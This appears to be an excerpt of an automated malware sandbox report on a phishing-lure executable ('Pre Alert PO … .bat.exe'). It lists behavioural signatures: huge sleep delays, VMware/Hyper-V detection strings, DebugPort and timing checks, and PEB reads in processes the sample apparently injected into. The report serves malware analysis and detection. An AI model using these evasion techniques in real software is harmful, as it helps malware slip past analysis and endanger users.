                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeMemory allocated: 2510000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeMemory allocated: 83B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeMemory allocated: 93B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeMemory allocated: 95A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeMemory allocated: A5A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeCode function: 0_2_0133D1D4 rdtsc 0_2_0133D1D4
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2326Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3897Jump to behavior
                      Source: C:\Windows\SysWOW64\runas.exeWindow / User API: threadDelayed 374
                      Source: C:\Windows\SysWOW64\runas.exeWindow / User API: threadDelayed 9599
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.7 %
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.2 %
                      Source: C:\Windows\SysWOW64\runas.exeAPI coverage: 2.6 %
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe TID: 7504Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8028Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep count: 3897 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8032Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe TID: 8156Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\runas.exe TID: 7460Thread sleep count: 374 > 30
                      Source: C:\Windows\SysWOW64\runas.exe TID: 7460Thread sleep time: -748000s >= -30000s
                      Source: C:\Windows\SysWOW64\runas.exe TID: 7460Thread sleep count: 9599 > 30
                      Source: C:\Windows\SysWOW64\runas.exe TID: 7460Thread sleep time: -19198000s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\runas.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\runas.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0050C8A0 FindFirstFileW,FindNextFileW,FindClose,18_2_0050C8A0
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: runas.exe, 00000012.00000002.2941572830.0000000000567000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                      Source: STiokuWkiGFJ.exe, 00000009.00000002.1936268136.000000000087D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
                      Source: nhClcdOjQwJ.exe, 00000013.00000002.2942434543.0000000000E9F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.2366611269.0000024F2137E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\runas.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeCode function: 0_2_0133D1D4 rdtsc 0_2_0133D1D4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00417D53 LdrLoadDll,8_2_00417D53
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01664164 mov eax, dword ptr fs:[00000030h]8_2_01664164
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01664164 mov eax, dword ptr fs:[00000030h]8_2_01664164
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01596154 mov eax, dword ptr fs:[00000030h]8_2_01596154
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01596154 mov eax, dword ptr fs:[00000030h]8_2_01596154
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158C156 mov eax, dword ptr fs:[00000030h]8_2_0158C156
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01624144 mov eax, dword ptr fs:[00000030h]8_2_01624144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01624144 mov eax, dword ptr fs:[00000030h]8_2_01624144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01624144 mov ecx, dword ptr fs:[00000030h]8_2_01624144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01624144 mov eax, dword ptr fs:[00000030h]8_2_01624144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01624144 mov eax, dword ptr fs:[00000030h]8_2_01624144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01628158 mov eax, dword ptr fs:[00000030h]8_2_01628158
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163E10E mov eax, dword ptr fs:[00000030h]8_2_0163E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163E10E mov ecx, dword ptr fs:[00000030h]8_2_0163E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163E10E mov eax, dword ptr fs:[00000030h]8_2_0163E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163E10E mov eax, dword ptr fs:[00000030h]8_2_0163E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163E10E mov ecx, dword ptr fs:[00000030h]8_2_0163E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163E10E mov eax, dword ptr fs:[00000030h]8_2_0163E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163E10E mov eax, dword ptr fs:[00000030h]8_2_0163E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163E10E mov ecx, dword ptr fs:[00000030h]8_2_0163E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163E10E mov eax, dword ptr fs:[00000030h]8_2_0163E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163E10E mov ecx, dword ptr fs:[00000030h]8_2_0163E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01650115 mov eax, dword ptr fs:[00000030h]8_2_01650115
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C0124 mov eax, dword ptr fs:[00000030h]8_2_015C0124
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163A118 mov ecx, dword ptr fs:[00000030h]8_2_0163A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163A118 mov eax, dword ptr fs:[00000030h]8_2_0163A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163A118 mov eax, dword ptr fs:[00000030h]8_2_0163A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163A118 mov eax, dword ptr fs:[00000030h]8_2_0163A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016661E5 mov eax, dword ptr fs:[00000030h]8_2_016661E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C01F8 mov eax, dword ptr fs:[00000030h]8_2_015C01F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016561C3 mov eax, dword ptr fs:[00000030h]8_2_016561C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016561C3 mov eax, dword ptr fs:[00000030h]8_2_016561C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160E1D0 mov eax, dword ptr fs:[00000030h]8_2_0160E1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160E1D0 mov eax, dword ptr fs:[00000030h]8_2_0160E1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160E1D0 mov ecx, dword ptr fs:[00000030h]8_2_0160E1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160E1D0 mov eax, dword ptr fs:[00000030h]8_2_0160E1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160E1D0 mov eax, dword ptr fs:[00000030h]8_2_0160E1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158A197 mov eax, dword ptr fs:[00000030h]8_2_0158A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158A197 mov eax, dword ptr fs:[00000030h]8_2_0158A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158A197 mov eax, dword ptr fs:[00000030h]8_2_0158A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D0185 mov eax, dword ptr fs:[00000030h]8_2_015D0185
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01634180 mov eax, dword ptr fs:[00000030h]8_2_01634180
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01634180 mov eax, dword ptr fs:[00000030h]8_2_01634180
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0164C188 mov eax, dword ptr fs:[00000030h]8_2_0164C188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0164C188 mov eax, dword ptr fs:[00000030h]8_2_0164C188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161019F mov eax, dword ptr fs:[00000030h]8_2_0161019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161019F mov eax, dword ptr fs:[00000030h]8_2_0161019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161019F mov eax, dword ptr fs:[00000030h]8_2_0161019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161019F mov eax, dword ptr fs:[00000030h]8_2_0161019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01592050 mov eax, dword ptr fs:[00000030h]8_2_01592050
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BC073 mov eax, dword ptr fs:[00000030h]8_2_015BC073
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01616050 mov eax, dword ptr fs:[00000030h]8_2_01616050
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015AE016 mov eax, dword ptr fs:[00000030h]8_2_015AE016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015AE016 mov eax, dword ptr fs:[00000030h]8_2_015AE016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015AE016 mov eax, dword ptr fs:[00000030h]8_2_015AE016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015AE016 mov eax, dword ptr fs:[00000030h]8_2_015AE016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01626030 mov eax, dword ptr fs:[00000030h]8_2_01626030
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01614000 mov ecx, dword ptr fs:[00000030h]8_2_01614000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01632000 mov eax, dword ptr fs:[00000030h]8_2_01632000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01632000 mov eax, dword ptr fs:[00000030h]8_2_01632000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01632000 mov eax, dword ptr fs:[00000030h]8_2_01632000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01632000 mov eax, dword ptr fs:[00000030h]8_2_01632000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01632000 mov eax, dword ptr fs:[00000030h]8_2_01632000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01632000 mov eax, dword ptr fs:[00000030h]8_2_01632000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01632000 mov eax, dword ptr fs:[00000030h]8_2_01632000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01632000 mov eax, dword ptr fs:[00000030h]8_2_01632000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158A020 mov eax, dword ptr fs:[00000030h]8_2_0158A020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158C020 mov eax, dword ptr fs:[00000030h]8_2_0158C020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016160E0 mov eax, dword ptr fs:[00000030h]8_2_016160E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158C0F0 mov eax, dword ptr fs:[00000030h]8_2_0158C0F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D20F0 mov ecx, dword ptr fs:[00000030h]8_2_015D20F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015980E9 mov eax, dword ptr fs:[00000030h]8_2_015980E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158A0E3 mov ecx, dword ptr fs:[00000030h]8_2_0158A0E3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016120DE mov eax, dword ptr fs:[00000030h]8_2_016120DE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016280A8 mov eax, dword ptr fs:[00000030h]8_2_016280A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159208A mov eax, dword ptr fs:[00000030h]8_2_0159208A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016560B8 mov eax, dword ptr fs:[00000030h]8_2_016560B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016560B8 mov ecx, dword ptr fs:[00000030h]8_2_016560B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015880A0 mov eax, dword ptr fs:[00000030h]8_2_015880A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163437C mov eax, dword ptr fs:[00000030h]8_2_0163437C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0166634F mov eax, dword ptr fs:[00000030h]8_2_0166634F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01638350 mov ecx, dword ptr fs:[00000030h]8_2_01638350
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165A352 mov eax, dword ptr fs:[00000030h]8_2_0165A352
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161035C mov eax, dword ptr fs:[00000030h]8_2_0161035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161035C mov eax, dword ptr fs:[00000030h]8_2_0161035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161035C mov eax, dword ptr fs:[00000030h]8_2_0161035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161035C mov ecx, dword ptr fs:[00000030h]8_2_0161035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161035C mov eax, dword ptr fs:[00000030h]8_2_0161035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161035C mov eax, dword ptr fs:[00000030h]8_2_0161035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01668324 mov eax, dword ptr fs:[00000030h]8_2_01668324
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01668324 mov ecx, dword ptr fs:[00000030h]8_2_01668324
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01668324 mov eax, dword ptr fs:[00000030h]8_2_01668324
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01668324 mov eax, dword ptr fs:[00000030h]8_2_01668324
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158C310 mov ecx, dword ptr fs:[00000030h]8_2_0158C310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B0310 mov ecx, dword ptr fs:[00000030h]8_2_015B0310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CA30B mov eax, dword ptr fs:[00000030h]8_2_015CA30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CA30B mov eax, dword ptr fs:[00000030h]8_2_015CA30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CA30B mov eax, dword ptr fs:[00000030h]8_2_015CA30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A3C0 mov eax, dword ptr fs:[00000030h]8_2_0159A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A3C0 mov eax, dword ptr fs:[00000030h]8_2_0159A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A3C0 mov eax, dword ptr fs:[00000030h]8_2_0159A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A3C0 mov eax, dword ptr fs:[00000030h]8_2_0159A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A3C0 mov eax, dword ptr fs:[00000030h]8_2_0159A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A3C0 mov eax, dword ptr fs:[00000030h]8_2_0159A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015983C0 mov eax, dword ptr fs:[00000030h]8_2_015983C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015983C0 mov eax, dword ptr fs:[00000030h]8_2_015983C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015983C0 mov eax, dword ptr fs:[00000030h]8_2_015983C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015983C0 mov eax, dword ptr fs:[00000030h]8_2_015983C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016163C0 mov eax, dword ptr fs:[00000030h]8_2_016163C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C63FF mov eax, dword ptr fs:[00000030h]8_2_015C63FF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0164C3CD mov eax, dword ptr fs:[00000030h]8_2_0164C3CD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015AE3F0 mov eax, dword ptr fs:[00000030h]8_2_015AE3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015AE3F0 mov eax, dword ptr fs:[00000030h]8_2_015AE3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015AE3F0 mov eax, dword ptr fs:[00000030h]8_2_015AE3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A03E9 mov eax, dword ptr fs:[00000030h]8_2_015A03E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A03E9 mov eax, dword ptr fs:[00000030h]8_2_015A03E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A03E9 mov eax, dword ptr fs:[00000030h]8_2_015A03E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A03E9 mov eax, dword ptr fs:[00000030h]8_2_015A03E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A03E9 mov eax, dword ptr fs:[00000030h]8_2_015A03E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A03E9 mov eax, dword ptr fs:[00000030h]8_2_015A03E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A03E9 mov eax, dword ptr fs:[00000030h]8_2_015A03E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A03E9 mov eax, dword ptr fs:[00000030h]8_2_015A03E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016343D4 mov eax, dword ptr fs:[00000030h]8_2_016343D4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016343D4 mov eax, dword ptr fs:[00000030h]8_2_016343D4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163E3DB mov eax, dword ptr fs:[00000030h]8_2_0163E3DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163E3DB mov eax, dword ptr fs:[00000030h]8_2_0163E3DB
